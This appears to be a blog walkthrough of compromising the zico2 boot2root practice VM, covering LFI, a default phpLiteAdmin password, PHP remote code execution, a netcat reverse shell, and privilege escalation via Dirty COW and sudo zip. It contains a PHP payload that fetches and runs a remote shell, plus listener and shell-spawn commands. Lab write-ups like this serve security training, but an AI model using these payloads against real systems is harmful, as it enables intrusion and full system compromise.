Rooting zico2 Walkthrough


zico2 is boot2root virtual machine designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise.

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • zico2 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • gcc
  • pentestermonkey reverse shell.

Vulnerabilities Exploited:

  • Default password
  • Local file inclusion and phpliteadmin RCE
  • Passwords misconfiguration
  • Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)
  • sudo misconfiguration



Target VM IP Address:



nmap -p- -A

Nmap findings:

  • Target box is linux machine
  • Secure shell on port 22
  • web server on port 80

Exploit path 1 for shell: LFI, phpliteadmin RCE

Lets explore website in browser

Found LFI

Other than LFI, nothing fancy. Lets explore website with dirbuster

I found dbadmin directory with dirbuster. is “phpLiteAdmin v1.9.3”

Googled “phpLiteAdmin v1.9.3” vulnerabilities, and found default password “admin” along with other vulnerabilities.

Logged into “phpLiteAdmin” with “admin” password.

“phpLiteAdmin v1.9.3” is vulnerable to other vulnerabilities that we will exploit.

Before that, lets check if we can crack test users password hashes and reuse that password for secure shell.

md5 hash cracked online



these username:passwords are not reusable over ssh.

Next target is phpliteadmin v1.9.3 vulnerabilities. Lets google!

Lets exploit php remote code execution in phpliteadmin.

Before exploiting sql injection over server, lets host reverse-shell.php on attacking machine:

and also start nc reverse connection handler on attacking machine.

nc -nvlp 1234

configuration on attacking machine is complete.

Now, attacking target box, i created database sahi, and renamed to sahi.php.

Then created a table with text column, and set default value to our code as:

<?php system(“wget -O /usr/databases/shell4.php; php /usr/databases/shell4.php”); ?>

access database file from browser

we received reverse shell connection

lets break shell jail

python -c “import pty; pty.spawn(‘/bin/bash’);”

exploring /home/zico/wordpres/wp-config.php we found database connection settings as



Lets login to secure shell with this username and password.

Privilege Escalation 1: Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege

Lets compile and root using this exploit

Congrats! we are root.

Privilege Escalation 2: System misconfiguration.

zip utility is given sudo privileges. zip utility can execute system commands. Since, utitlity is provided with sudo privileges, every command is executed as root when zip utility is invoked with sudo. So lets invoke shell!!!

Congrats, we are 2nd time root!!!

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s